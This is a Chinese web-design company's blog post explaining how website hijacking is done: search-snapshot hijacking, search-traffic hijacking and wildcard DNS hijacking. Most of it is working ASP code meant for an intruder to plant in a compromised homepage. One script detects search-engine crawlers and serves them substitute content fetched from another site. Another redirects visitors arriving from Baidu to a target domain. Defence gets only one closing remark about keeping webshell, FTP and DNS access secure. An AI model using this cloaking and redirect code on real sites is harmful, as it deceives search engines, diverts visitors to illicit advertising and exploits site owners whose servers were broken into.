2021-03-04 分类: 网站建设
前两天看到有网友问网站引擎劫持,网站快照劫持,新闻源劫持是怎么操作的。结果大多数网友都表示不了解,我今天来跟大家分享一下网站劫持是怎么操作的,如何防范。
1.网站快照劫持
动态页面首页通过在PHP或者ASP,ASPX文件中添加判断代码,判断如果是蜘蛛访问就修改标题内容,在标题内容写入联系方式和非法广告信息,如果不是蜘蛛访问就不做修改。
静态页面首页,在下午三点左右删除你的.html文件,添加inde.php,php中写入类似上面的语句,如果是蜘蛛就返回修改了标题的首页内容,不是就返回正常内容。
快照劫持比较讨厌,就算你修复了劫持,百度上还是会显示很长一段时间的非法快照信息。
代码如下:
<%
function GetBot()
'查询蜘蛛
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT") '关键判断语句
if instr(1,s_agent,"googlebot",1) >0 then
GetBot="google"
end if
if instr(1,s_agent,"msnbot",1) >0 then
GetBot="MSN"
end if
if instr(1,s_agent,"slurp",1) >0 then
GetBot="Yahoo"
end if
if instr(1,s_agent,"baiduspider",1) >0 then
GetBot="baidu"
end if
if instr(1,s_agent,"sohu-search",1) >0 then
GetBot="Sohu"
end if
if instr(1,s_agent,"lycos",1) >0 then
GetBot="Lycos"
end if
if instr(1,s_agent,"robozilla",1) >0 then
GetBot="Robozilla"
end if
end function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,"GB2312")'编码
End function
Function Newstring(wstr,strng)
Newstring=Instr(lcase(wstr),lcase(strng))
if Newstring<=0 then Newstring=Len(wstr)
End Function
Function GetBody(url)
on error resume next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Dim wstr,str,url,start,over,dtime
if GetBot="baidu" then
'给百度蜘蛛定制的内容
url="http://baidu.seowhy.com"
'想要展示给蜘蛛的页面地址
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
elseif GetBot="google" then
'给google 蜘蛛定制的内容
url="http://baidu.seowhy.com"
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
end if
2.搜索引擎流量劫持
这种劫持比快照劫持简单,直接在首页添加,判断访问来路是搜索引擎还是其它的JS代码,当来路是搜索引擎的时候就跳转到目标站。
代码如下:
<%
ifinstr(Request.ServerVariables("http_referer"),"www.baidu.com")>0then
'如果用户来自www.baidu.com
response.redirect("http://baidu.seowhy.com/")
'跳转指定地址
end if
%>
3.DNS白菜站劫持
在域名解析里添加泛解析到目标地址,在目标地址主机上大量生成劫持域名的子站。
总结:1和2需要获得网站的WEBSHELL或者FTP,如果获得了新闻源网站的这种权限,就可以做新闻源劫持;3需要获得DNS管理帐号。所以造成网站被劫持的主要原因还是自己网站被入侵,或者被扫FTP的挖掘机扫出了FTP帐号等,网络安全没做好的原因。所以只要网络安全到位,别人是劫持不你的网站的。欢迎大家持续关注北京网站建设公司的网站,希望大家能够从创新的网站中学到东西,增强自己的知识。
名称栏目:网站引擎劫持,网站快照劫持,新闻源劫持如何操作与防范
浏览路径:https://www.cdcxhl.com/news/104168.html
成都网站建设公司_创新互联,为您提供企业网站制作、品牌网站设计、网站排名、定制开发、做网站、静态网站
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联
猜你还喜欢下面的内容